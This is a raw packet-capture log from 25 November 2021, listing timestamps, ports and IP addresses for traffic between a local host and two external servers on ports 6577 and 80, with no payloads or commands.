Nov 25, 2021 11:28:24.050702095 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.050745010 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.050777912 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.050875902 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.051040888 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.051209927 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.080431938 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.094540119 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.094810963 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.102490902 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.102633953 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.102700949 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.102715969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.102767944 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.102864981 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.147279024 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.154824018 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.206033945 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.364170074 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.364433050 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.364823103 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.380283117 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.394099951 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.424961090 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.542069912 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.542262077 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.542314053 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.542363882 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.542530060 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.598278999 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.598345041 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.598377943 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.598408937 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.598440886 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.598469019 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.598480940 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.598639011 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.598798990 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.649498940 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.649579048 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.649629116 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.649674892 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.649707079 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.649828911 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.650016069 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.650065899 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.659015894 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.659065962 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.659104109 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.659166098 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.659202099 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.659228086 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.659383059 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.659421921 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.662688971 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.662851095 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.700036049 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.700429916 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.712143898 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.712210894 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.712244987 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.712275982 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.712307930 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.712342024 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.712347031 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.712472916 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.712505102 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.712567091 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.712841034 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.756943941 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.757139921 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.771114111 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.771158934 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.771192074 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.771223068 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.771398067 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.771513939 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.808258057 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.808463097 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.811757088 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.811992884 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.832819939 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.832870007 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.832902908 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.832935095 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.832966089 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.833045959 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.833199978 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.833372116 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.864217043 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.864533901 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.890295982 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.890341997 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.890496016 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.890651941 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.890662909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.890742064 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.890779972 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.890810966 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.891005993 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.891166925 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.891334057 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.921042919 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.921452999 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.933926105 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.933993101 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.934041023 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.934087992 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.934134007 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.934180975 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.934226990 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.934274912 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:24.934308052 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.934366941 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.934381008 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.934391022 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.934400082 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.934408903 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.934432983 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:24.944293022 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.944370985 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.944406033 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.944437027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.944468021 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.944503069 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.944508076 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.944662094 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.944827080 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.978259087 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.978451967 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.996644974 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.996721983 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.996754885 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.996786118 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.996906042 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.997016907 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.997179031 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.032103062 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.032510042 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.050349951 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.050446033 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.050493002 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.050538063 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.050571918 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.050604105 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.050673008 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.050725937 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.050893068 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.050934076 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.084670067 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.102099895 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.103353024 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.104060888 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.104260921 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.104351044 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.143673897 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.208661079 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.218126059 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218214035 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218277931 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218341112 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218367100 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218404055 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218467951 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218529940 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218535900 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218588114 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218595028 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218657970 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218713999 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218719959 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218765974 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218780994 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218784094 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218847036 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218903065 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218909025 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218952894 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218969107 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218972921 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.218981028 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.218993902 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.219022989 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.219037056 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.219101906 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.219249964 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.219300985 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.219439030 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.376846075 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.424746990 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.504539013 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.504681110 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.504730940 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.504757881 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.504776955 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.504826069 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.504930973 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.504980087 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505026102 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505038023 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505073071 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505078077 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505120993 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505168915 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505214930 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505219936 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505258083 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505263090 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505270004 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505280972 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505310059 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505357027 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505403996 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505402088 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505453110 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505501032 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505548000 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505575895 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505595922 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505614996 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505626917 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505644083 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505691051 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505737066 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505744934 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505784035 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505784035 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505795002 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505805016 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505831957 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505858898 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.505880117 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505928040 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.505974054 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.506020069 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.506032944 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506043911 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506052971 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506062031 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506067038 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.506114960 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.506161928 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.506211042 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506221056 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506231070 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506239891 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506409883 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506448030 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.506539106 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.528569937 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.528803110 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.528851032 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.528902054 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.584940910 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.584999084 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.585037947 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.585072994 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.585107088 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.585141897 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.585177898 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.585243940 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.585403919 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.641112089 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.641179085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.641222954 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.641266108 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.641309977 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.641339064 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.641371965 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.641489029 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.641649008 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.641823053 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.708416939 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.708475113 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.708513021 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.708548069 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.708583117 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.708626986 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.708786011 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.765212059 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.765281916 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.765326023 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.765367985 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.765408039 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.765449047 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.765467882 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.765535116 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.765605927 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.765782118 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.790442944 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.790555954 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.790620089 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.790682077 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.790743113 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.790803909 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.790864944 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.790891886 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.790926933 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.790956020 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.790990114 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791052103 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791076899 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791114092 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791126966 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791177988 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791238070 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791253090 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791301012 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791363001 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791421890 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791424990 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791471958 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791488886 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791490078 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791501045 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791513920 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791554928 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791558981 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791578054 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791620016 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791681051 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791740894 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791774035 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791802883 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791917086 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.791953087 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.791980028 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792006016 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792021036 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792032957 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792045116 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792045116 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792074919 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792109013 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792171955 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792232990 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792251110 CET	49810	80	192.168.11.20	103.167.84.150
